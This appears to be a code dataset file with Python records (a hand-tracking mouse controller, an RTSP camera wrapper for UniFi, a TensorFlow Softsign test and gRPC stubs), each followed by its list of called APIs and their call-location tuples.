cy = int(moment['m01'] / moment['m00'])
return cx, cy
else:
return None
def farthest_point(defects, contour, centroid):
if defects is not None and centroid is not None:
s = defects[:, 0][:, 0]
cx, cy = centroid
x = np.array(contour[s][:, 0][:, 0], dtype=np.float)
y = np.array(contour[s][:, 0][:, 1], dtype=np.float)
xp = cv2.pow(cv2.subtract(x, cx), 2)
yp = cv2.pow(cv2.subtract(y, cy), 2)
dist = cv2.sqrt(cv2.add(xp, yp))
dist_max_i = np.argmax(dist)
if dist_max_i < len(s):
farthest_defect = s[dist_max_i]
farthest_point = tuple(contour[farthest_defect][0])
return farthest_point
else:
return None
def draw_circles(frame, traverse_point):
if traverse_point is not None:
for i in range(len(traverse_point)):
cv2.circle(frame, traverse_point[i], int(5 - (5 * i * 3) / 100), [0, 255, 255], -1)
def manage_image_opr(frame, hand_hist):
hist_mask_image = hist_masking(frame, hand_hist)
hist_mask_image = cv2.erode(hist_mask_image, None, iterations=2)
hist_mask_image = cv2.dilate(hist_mask_image, None, iterations=2)
contour_list = contours(hist_mask_image)
max_cont = max(contour_list, key=cv2.contourArea)
cnt_centroid = centroid(max_cont)
cv2.circle(frame, cnt_centroid, 5, [255, 0, 255], -1)
if max_cont is not None:
hull = cv2.convexHull(max_cont, returnPoints=False)
defects = cv2.convexityDefects(max_cont, hull)
far_point = farthest_point(defects, max_cont, cnt_centroid)
print("Centroid : " + str(cnt_centroid) + ", farthest Point : " + str(far_point))
#usar farthest_point aqui para el mouse
puntox=far_point[0]*(1920/640)
if (far_point[1])<=235:
puntoyf=(far_point[1]-(60*(1-((far_point[1]-60)/180))))*(1080/480)
elif (far_point[1])>=245:
puntoyf=(far_point[1]+(60*((far_point[1]-245)/175)))*(1080/480)
else:
puntoyf=(far_point[1])*(1080/480)
pyautogui.moveTo(puntox,puntoyf)
#######################################
cv2.circle(frame, far_point, 5, [0, 0, 255], -1)
if len(traverse_point) < 20:
traverse_point.append(far_point)
else:
traverse_point.pop(0)
traverse_point.append(far_point)
draw_circles(frame, traverse_point)
def main():
global hand_hist
is_hand_hist_created = False
capture = cv2.VideoCapture(0)
while capture.isOpened():
pressed_key = cv2.waitKey(1)
_, frame = capture.read()
frame = cv2.flip(frame, 1)
if pressed_key & 0xFF == ord('z'):
is_hand_hist_created = True
hand_hist = hand_histogram(frame)
if is_hand_hist_created:
manage_image_opr(frame, hand_hist)
else:
frame = draw_rect(frame)
cv2.imshow("Live Feed", rescale_frame(frame))
if pressed_key == 27:
break
cv2.destroyAllWindows()
capture.release()
if __name__ == '__main__':
main()
|
[
"cv2.bitwise_and",
"numpy.argmax",
"cv2.rectangle",
"cv2.normalize",
"cv2.erode",
"cv2.convexityDefects",
"cv2.subtract",
"cv2.filter2D",
"cv2.dilate",
"cv2.cvtColor",
"cv2.calcBackProject",
"cv2.destroyAllWindows",
"cv2.resize",
"cv2.circle",
"cv2.waitKey",
"cv2.calcHist",
"cv2.convexHull",
"cv2.flip",
"cv2.merge",
"cv2.add",
"cv2.getStructuringElement",
"cv2.threshold",
"cv2.moments",
"numpy.zeros",
"cv2.VideoCapture",
"numpy.array",
"cv2.findContours",
"pyautogui.moveTo"
] |
[((364, 428), 'cv2.resize', 'cv2.resize', (['frame', '(width, height)'], {'interpolation': 'cv2.INTER_AREA'}), '(frame, (width, height), interpolation=cv2.INTER_AREA)\n', (374, 428), False, 'import cv2\n'), ((489, 538), 'cv2.cvtColor', 'cv2.cvtColor', (['hist_mask_image', 'cv2.COLOR_BGR2GRAY'], {}), '(hist_mask_image, cv2.COLOR_BGR2GRAY)\n', (501, 538), False, 'import cv2\n'), ((557, 603), 'cv2.threshold', 'cv2.threshold', (['gray_hist_mask_image', '(0)', '(255)', '(0)'], {}), '(gray_hist_mask_image, 0, 255, 0)\n', (570, 603), False, 'import cv2\n'), ((626, 690), 'cv2.findContours', 'cv2.findContours', (['thresh', 'cv2.RETR_TREE', 'cv2.CHAIN_APPROX_SIMPLE'], {}), '(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n', (642, 690), False, 'import cv2\n'), ((880, 1054), 'numpy.array', 'np.array', (['[6 * rows / 20, 6 * rows / 20, 6 * rows / 20, 9 * rows / 20, 9 * rows / 20,\n 9 * rows / 20, 12 * rows / 20, 12 * rows / 20, 12 * rows / 20]'], {'dtype': 'np.uint32'}), '([6 * rows / 20, 6 * rows / 20, 6 * rows / 20, 9 * rows / 20, 9 *\n rows / 20, 9 * rows / 20, 12 * rows / 20, 12 * rows / 20, 12 * rows / \n 20], dtype=np.uint32)\n', (888, 1054), True, 'import numpy as np\n'), ((1087, 1264), 'numpy.array', 'np.array', (['[9 * cols / 20, 10 * cols / 20, 11 * cols / 20, 9 * cols / 20, 10 * cols / \n 20, 11 * cols / 20, 9 * cols / 20, 10 * cols / 20, 11 * cols / 20]'], {'dtype': 'np.uint32'}), '([9 * cols / 20, 10 * cols / 20, 11 * cols / 20, 9 * cols / 20, 10 *\n cols / 20, 11 * cols / 20, 9 * cols / 20, 10 * cols / 20, 11 * cols / \n 20], dtype=np.uint32)\n', (1095, 1264), True, 'import numpy as np\n'), ((1680, 1718), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2HSV'], {}), '(frame, cv2.COLOR_BGR2HSV)\n', (1692, 1718), False, 'import cv2\n'), ((1729, 1773), 'numpy.zeros', 'np.zeros', (['[90, 10, 3]'], {'dtype': 'hsv_frame.dtype'}), '([90, 10, 3], dtype=hsv_frame.dtype)\n', (1737, 1773), True, 'import numpy as np\n'), ((2011, 2074), 'cv2.calcHist', 'cv2.calcHist', (['[roi]', '[0, 1]', 'None', '[180, 256]', '[0, 180, 0, 256]'], {}), '([roi], [0, 1], None, [180, 256], [0, 180, 0, 256])\n', (2023, 2074), False, 'import cv2\n'), ((2086, 2146), 'cv2.normalize', 'cv2.normalize', (['hand_hist', 'hand_hist', '(0)', '(255)', 'cv2.NORM_MINMAX'], {}), '(hand_hist, hand_hist, 0, 255, cv2.NORM_MINMAX)\n', (2099, 2146), False, 'import cv2\n'), ((2190, 2228), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2HSV'], {}), '(frame, cv2.COLOR_BGR2HSV)\n', (2202, 2228), False, 'import cv2\n'), ((2240, 2301), 'cv2.calcBackProject', 'cv2.calcBackProject', (['[hsv]', '[0, 1]', 'hist', '[0, 180, 0, 256]', '(1)'], {}), '([hsv], [0, 1], hist, [0, 180, 0, 256], 1)\n', (2259, 2301), False, 'import cv2\n'), ((2314, 2368), 'cv2.getStructuringElement', 'cv2.getStructuringElement', (['cv2.MORPH_ELLIPSE', '(31, 31)'], {}), '(cv2.MORPH_ELLIPSE, (31, 31))\n', (2339, 2368), False, 'import cv2\n'), ((2373, 2405), 'cv2.filter2D', 'cv2.filter2D', (['dst', '(-1)', 'disc', 'dst'], {}), '(dst, -1, disc, dst)\n', (2385, 2405), False, 'import cv2\n'), ((2425, 2472), 'cv2.threshold', 'cv2.threshold', (['dst', '(150)', '(255)', 'cv2.THRESH_BINARY'], {}), '(dst, 150, 255, cv2.THRESH_BINARY)\n', (2438, 2472), False, 'import cv2\n'), ((2542, 2577), 'cv2.merge', 'cv2.merge', (['(thresh, thresh, thresh)'], {}), '((thresh, thresh, thresh))\n', (2551, 2577), False, 'import cv2\n'), ((2590, 2620), 'cv2.bitwise_and', 'cv2.bitwise_and', (['frame', 'thresh'], {}), '(frame, thresh)\n', (2605, 2620), False, 'import cv2\n'), ((2663, 2687), 'cv2.moments', 'cv2.moments', (['max_contour'], {}), '(max_contour)\n', (2674, 2687), False, 'import cv2\n'), ((3867, 3913), 'cv2.erode', 'cv2.erode', (['hist_mask_image', 'None'], {'iterations': '(2)'}), '(hist_mask_image, None, iterations=2)\n', (3876, 3913), False, 'import cv2\n'), ((3936, 3983), 'cv2.dilate', 'cv2.dilate', (['hist_mask_image', 'None'], {'iterations': '(2)'}), '(hist_mask_image, None, iterations=2)\n', (3946, 3983), False, 'import cv2\n'), ((4127, 4180), 'cv2.circle', 'cv2.circle', (['frame', 'cnt_centroid', '(5)', '[255, 0, 255]', '(-1)'], {}), '(frame, cnt_centroid, 5, [255, 0, 255], -1)\n', (4137, 4180), False, 'import cv2\n'), ((5300, 5319), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (5316, 5319), False, 'import cv2\n'), ((5829, 5852), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (5850, 5852), False, 'import cv2\n'), ((1407, 1532), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(hand_rect_one_y[i], hand_rect_one_x[i])', '(hand_rect_two_y[i], hand_rect_two_x[i])', '(0, 255, 0)', '(1)'], {}), '(frame, (hand_rect_one_y[i], hand_rect_one_x[i]), (\n hand_rect_two_y[i], hand_rect_two_x[i]), (0, 255, 0), 1)\n', (1420, 1532), False, 'import cv2\n'), ((3037, 3085), 'numpy.array', 'np.array', (['contour[s][:, 0][:, 0]'], {'dtype': 'np.float'}), '(contour[s][:, 0][:, 0], dtype=np.float)\n', (3045, 3085), True, 'import numpy as np\n'), ((3098, 3146), 'numpy.array', 'np.array', (['contour[s][:, 0][:, 1]'], {'dtype': 'np.float'}), '(contour[s][:, 0][:, 1], dtype=np.float)\n', (3106, 3146), True, 'import numpy as np\n'), ((3301, 3316), 'numpy.argmax', 'np.argmax', (['dist'], {}), '(dist)\n', (3310, 3316), True, 'import numpy as np\n'), ((4226, 4270), 'cv2.convexHull', 'cv2.convexHull', (['max_cont'], {'returnPoints': '(False)'}), '(max_cont, returnPoints=False)\n', (4240, 4270), False, 'import cv2\n'), ((4289, 4325), 'cv2.convexityDefects', 'cv2.convexityDefects', (['max_cont', 'hull'], {}), '(max_cont, hull)\n', (4309, 4325), False, 'import cv2\n'), ((4860, 4893), 'pyautogui.moveTo', 'pyautogui.moveTo', (['puntox', 'puntoyf'], {}), '(puntox, puntoyf)\n', (4876, 4893), False, 'import pyautogui\n'), ((4949, 4997), 'cv2.circle', 'cv2.circle', (['frame', 'far_point', '(5)', '[0, 0, 255]', '(-1)'], {}), '(frame, far_point, 5, [0, 0, 255], -1)\n', (4959, 4997), False, 'import cv2\n'), ((5373, 5387), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (5384, 5387), False, 'import cv2\n'), ((5438, 5456), 'cv2.flip', 'cv2.flip', (['frame', '(1)'], {}), '(frame, 1)\n', (5446, 5456), False, 'import cv2\n'), ((3169, 3188), 'cv2.subtract', 'cv2.subtract', (['x', 'cx'], {}), '(x, cx)\n', (3181, 3188), False, 'import cv2\n'), ((3214, 3233), 'cv2.subtract', 'cv2.subtract', (['y', 'cy'], {}), '(y, cy)\n', (3226, 3233), False, 'import cv2\n'), ((3262, 3277), 'cv2.add', 'cv2.add', (['xp', 'yp'], {}), '(xp, yp)\n', (3269, 3277), False, 'import cv2\n')]
|
import argparse
import logging
import subprocess
import tempfile
from pathlib import Path
from aiohttp import web
from PIL import Image
from unifi.cams.base import UnifiCamBase
class RTSPCam(UnifiCamBase):
def __init__(self, args: argparse.Namespace, logger: logging.Logger) -> None:
super().__init__(args, logger)
self.args = args
self.event_id = 0
self.snapshot_dir = tempfile.mkdtemp()
self.snapshot_stream = None
self.runner = None
if not self.args.snapshot_url:
self.start_snapshot_stream()
@classmethod
def add_parser(cls, parser: argparse.ArgumentParser) -> None:
super().add_parser(parser)
parser.add_argument("--source", "-s", required=True, help="Stream source")
parser.add_argument(
"--http-api",
default=0,
type=int,
help="Specify a port number to enable the HTTP API (default: disabled)",
)
parser.add_argument(
"--snapshot-url",
"-i",
default=None,
type=str,
required=False,
help="HTTP endpoint to fetch snapshot image from",
)
def start_snapshot_stream(self) -> None:
if not self.snapshot_stream or self.snapshot_stream.poll() is not None:
cmd = (
f"ffmpeg -nostdin -y -re -rtsp_transport {self.args.rtsp_transport} "
f'-i "{self .args.source}" '
"-vf fps=1 "
f"-update 1 {self.snapshot_dir}/screen.jpg"
)
self.logger.info(f"Spawning stream for snapshots: {cmd}")
self.snapshot_stream = subprocess.Popen(
cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, shell=True
)
async def get_snapshot(self) -> Path:
img_file = Path(self.snapshot_dir, "screen.jpg")
if self.args.snapshot_url:
img_file_fullres = Path(self.snapshot_dir, "screen_fullres.jpg")
self.logger.info(f"Downloading snapshot from {self.args.snapshot_url}")
if await self.fetch_to_file(self.args.snapshot_url, img_file_fullres):
size = 1920, 1080
self.logger.info(f"Resizing image to {size}")
with Image.open(img_file_fullres) as im:
im.thumbnail(size)
im.save(img_file, "JPEG")
else:
self.logger.info(f"Could not download screenshot")
else:
self.start_snapshot_stream()
return img_file
async def run(self) -> None:
if self.args.http_api:
self.logger.info(f"Enabling HTTP API on port {self.args.http_api}")
app = web.Application()
async def start_motion(request):
self.logger.debug("Starting motion")
await self.trigger_motion_start()
return web.Response(text="ok")
async def stop_motion(request):
self.logger.debug("Starting motion")
await self.trigger_motion_stop()
return web.Response(text="ok")
app.add_routes([web.get("/start_motion", start_motion)])
app.add_routes([web.get("/stop_motion", stop_motion)])
self.runner = web.AppRunner(app)
await self.runner.setup()
site = web.TCPSite(self.runner, port=self.args.http_api)
await site.start()
async def close(self) -> None:
await super().close()
if self.runner:
await self.runner.cleanup()
if self.snapshot_stream:
self.snapshot_stream.kill()
def get_stream_source(self, stream_index: str) -> str:
return self.args.source
|
[
"subprocess.Popen",
"aiohttp.web.Response",
"aiohttp.web.TCPSite",
"PIL.Image.open",
"pathlib.Path",
"tempfile.mkdtemp",
"aiohttp.web.get",
"aiohttp.web.AppRunner",
"aiohttp.web.Application"
] |
[((411, 429), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (427, 429), False, 'import tempfile\n'), ((1861, 1898), 'pathlib.Path', 'Path', (['self.snapshot_dir', '"""screen.jpg"""'], {}), "(self.snapshot_dir, 'screen.jpg')\n", (1865, 1898), False, 'from pathlib import Path\n'), ((1681, 1772), 'subprocess.Popen', 'subprocess.Popen', (['cmd'], {'stdout': 'subprocess.DEVNULL', 'stderr': 'subprocess.DEVNULL', 'shell': '(True)'}), '(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,\n shell=True)\n', (1697, 1772), False, 'import subprocess\n'), ((1965, 2010), 'pathlib.Path', 'Path', (['self.snapshot_dir', '"""screen_fullres.jpg"""'], {}), "(self.snapshot_dir, 'screen_fullres.jpg')\n", (1969, 2010), False, 'from pathlib import Path\n'), ((2745, 2762), 'aiohttp.web.Application', 'web.Application', ([], {}), '()\n', (2760, 2762), False, 'from aiohttp import web\n'), ((3317, 3335), 'aiohttp.web.AppRunner', 'web.AppRunner', (['app'], {}), '(app)\n', (3330, 3335), False, 'from aiohttp import web\n'), ((3393, 3442), 'aiohttp.web.TCPSite', 'web.TCPSite', (['self.runner'], {'port': 'self.args.http_api'}), '(self.runner, port=self.args.http_api)\n', (3404, 3442), False, 'from aiohttp import web\n'), ((2935, 2958), 'aiohttp.web.Response', 'web.Response', ([], {'text': '"""ok"""'}), "(text='ok')\n", (2947, 2958), False, 'from aiohttp import web\n'), ((3129, 3152), 'aiohttp.web.Response', 'web.Response', ([], {'text': '"""ok"""'}), "(text='ok')\n", (3141, 3152), False, 'from aiohttp import web\n'), ((2295, 2323), 'PIL.Image.open', 'Image.open', (['img_file_fullres'], {}), '(img_file_fullres)\n', (2305, 2323), False, 'from PIL import Image\n'), ((3182, 3220), 'aiohttp.web.get', 'web.get', (['"""/start_motion"""', 'start_motion'], {}), "('/start_motion', start_motion)\n", (3189, 3220), False, 'from aiohttp import web\n'), ((3251, 3287), 'aiohttp.web.get', 'web.get', (['"""/stop_motion"""', 'stop_motion'], {}), "('/stop_motion', stop_motion)\n", (3258, 3287), False, 'from aiohttp import web\n')]
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Softsign and SoftsignGrad."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import nn_ops
import tensorflow.python.ops.nn_grad # pylint: disable=unused-import
from tensorflow.python.platform import test
class SoftsignTest(test.TestCase):
def _npSoftsign(self, np_features):
return np_features / (1 + np.abs(np_features))
def _testSoftsign(self, np_features, use_gpu=False):
np_softsign = self._npSoftsign(np_features)
with self.cached_session(use_gpu=use_gpu):
softsign = nn_ops.softsign(np_features)
tf_softsign = self.evaluate(softsign)
self.assertAllClose(np_softsign, tf_softsign)
self.assertShapeEqual(np_softsign, softsign)
def testNumbers(self):
for t in [np.float, np.double]:
self._testSoftsign(
np.array([[-9, 7, -5, 3, -1], [1, -3, 5, -7, 9]]).astype(t),
use_gpu=False)
self._testSoftsign(
np.array([[-9, 7, -5, 3, -1], [1, -3, 5, -7, 9]]).astype(t),
use_gpu=True)
def testGradient(self):
with self.cached_session():
x = constant_op.constant(
[-0.9, -0.7, -0.5, -0.3, -0.1, 0.1, 0.3, 0.5, 0.7, 0.9],
shape=[2, 5],
name="x")
y = nn_ops.softsign(x, name="softsign")
x_init = np.asarray(
[[-0.9, -0.7, -0.5, -0.3, -0.1], [0.1, 0.3, 0.5, 0.7, 0.9]],
dtype=np.float32,
order="F")
err = gradient_checker.compute_gradient_error(
x, [2, 5], y, [2, 5], x_init_value=x_init)
print("softsign (float) gradient err = ", err)
self.assertLess(err, 1e-4)
def testNoInts(self):
with self.cached_session():
with self.assertRaisesRegexp(
TypeError,
"'features' has DataType int32 not in list of allowed values"):
nn_ops.softsign(constant_op.constant(7)).eval()
if __name__ == "__main__":
test.main()
|
[
"tensorflow.python.platform.test.main",
"tensorflow.python.ops.gradient_checker.compute_gradient_error",
"numpy.abs",
"numpy.asarray",
"tensorflow.python.framework.constant_op.constant",
"tensorflow.python.ops.nn_ops.softsign",
"numpy.array"
] |
[((2751, 2762), 'tensorflow.python.platform.test.main', 'test.main', ([], {}), '()\n', (2760, 2762), False, 'from tensorflow.python.platform import test\n'), ((1416, 1444), 'tensorflow.python.ops.nn_ops.softsign', 'nn_ops.softsign', (['np_features'], {}), '(np_features)\n', (1431, 1444), False, 'from tensorflow.python.ops import nn_ops\n'), ((1962, 2068), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['[-0.9, -0.7, -0.5, -0.3, -0.1, 0.1, 0.3, 0.5, 0.7, 0.9]'], {'shape': '[2, 5]', 'name': '"""x"""'}), "([-0.9, -0.7, -0.5, -0.3, -0.1, 0.1, 0.3, 0.5, 0.7, 0.9\n ], shape=[2, 5], name='x')\n", (1982, 2068), False, 'from tensorflow.python.framework import constant_op\n'), ((2105, 2140), 'tensorflow.python.ops.nn_ops.softsign', 'nn_ops.softsign', (['x'], {'name': '"""softsign"""'}), "(x, name='softsign')\n", (2120, 2140), False, 'from tensorflow.python.ops import nn_ops\n'), ((2156, 2260), 'numpy.asarray', 'np.asarray', (['[[-0.9, -0.7, -0.5, -0.3, -0.1], [0.1, 0.3, 0.5, 0.7, 0.9]]'], {'dtype': 'np.float32', 'order': '"""F"""'}), "([[-0.9, -0.7, -0.5, -0.3, -0.1], [0.1, 0.3, 0.5, 0.7, 0.9]],\n dtype=np.float32, order='F')\n", (2166, 2260), True, 'import numpy as np\n'), ((2300, 2387), 'tensorflow.python.ops.gradient_checker.compute_gradient_error', 'gradient_checker.compute_gradient_error', (['x', '[2, 5]', 'y', '[2, 5]'], {'x_init_value': 'x_init'}), '(x, [2, 5], y, [2, 5], x_init_value=\n x_init)\n', (2339, 2387), False, 'from tensorflow.python.ops import gradient_checker\n'), ((1227, 1246), 'numpy.abs', 'np.abs', (['np_features'], {}), '(np_features)\n', (1233, 1246), True, 'import numpy as np\n'), ((1686, 1735), 'numpy.array', 'np.array', (['[[-9, 7, -5, 3, -1], [1, -3, 5, -7, 9]]'], {}), '([[-9, 7, -5, 3, -1], [1, -3, 5, -7, 9]])\n', (1694, 1735), True, 'import numpy as np\n'), ((1808, 1857), 'numpy.array', 'np.array', (['[[-9, 7, -5, 3, -1], [1, -3, 5, -7, 9]]'], {}), '([[-9, 7, -5, 3, -1], [1, -3, 5, -7, 9]])\n', (1816, 1857), True, 'import numpy as np\n'), ((2688, 2711), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(7)'], {}), '(7)\n', (2708, 2711), False, 'from tensorflow.python.framework import constant_op\n')]
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
import example_pb2 as example__pb2
class AgentStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.InitializeAgents = channel.unary_unary(
'/Agent/InitializeAgents',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.HandleMessage = channel.unary_unary(
'/Agent/HandleMessage',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.InvokeSoloAgent = channel.unary_unary(
'/Agent/InvokeSoloAgent',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.GetAgents = channel.unary_unary(
'/Agent/GetAgents',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.SetAgentFields = channel.unary_unary(
'/Agent/SetAgentFields',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.HandleSlashCommand = channel.unary_unary(
'/Agent/HandleSlashCommand',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.HandleUserUpdate = channel.unary_unary(
'/Agent/HandleUserUpdate',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.HandleMessageReaction = channel.unary_unary(
'/Agent/HandleMessageReaction',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
class AgentServicer(object):
"""Missing associated documentation comment in .proto file."""
def InitializeAgents(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HandleMessage(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def InvokeSoloAgent(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetAgents(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetAgentFields(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HandleSlashCommand(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HandleUserUpdate(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HandleMessageReaction(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_AgentServicer_to_server(servicer, server):
rpc_method_handlers = {
'InitializeAgents': grpc.unary_unary_rpc_method_handler(
servicer.InitializeAgents,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'HandleMessage': grpc.unary_unary_rpc_method_handler(
servicer.HandleMessage,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'InvokeSoloAgent': grpc.unary_unary_rpc_method_handler(
servicer.InvokeSoloAgent,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'GetAgents': grpc.unary_unary_rpc_method_handler(
servicer.GetAgents,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'SetAgentFields': grpc.unary_unary_rpc_method_handler(
servicer.SetAgentFields,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'HandleSlashCommand': grpc.unary_unary_rpc_method_handler(
servicer.HandleSlashCommand,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'HandleUserUpdate': grpc.unary_unary_rpc_method_handler(
servicer.HandleUserUpdate,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'HandleMessageReaction': grpc.unary_unary_rpc_method_handler(
servicer.HandleMessageReaction,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'Agent', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Agent(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def InitializeAgents(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/InitializeAgents',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def HandleMessage(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/HandleMessage',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def InvokeSoloAgent(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/InvokeSoloAgent',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetAgents(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/GetAgents',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetAgentFields(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/SetAgentFields',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def HandleSlashCommand(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/HandleSlashCommand',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def HandleUserUpdate(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/HandleUserUpdate',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def HandleMessageReaction(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/HandleMessageReaction',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
|
[
"grpc.method_handlers_generic_handler",
"grpc.unary_unary_rpc_method_handler",
"grpc.experimental.unary_unary"
] |
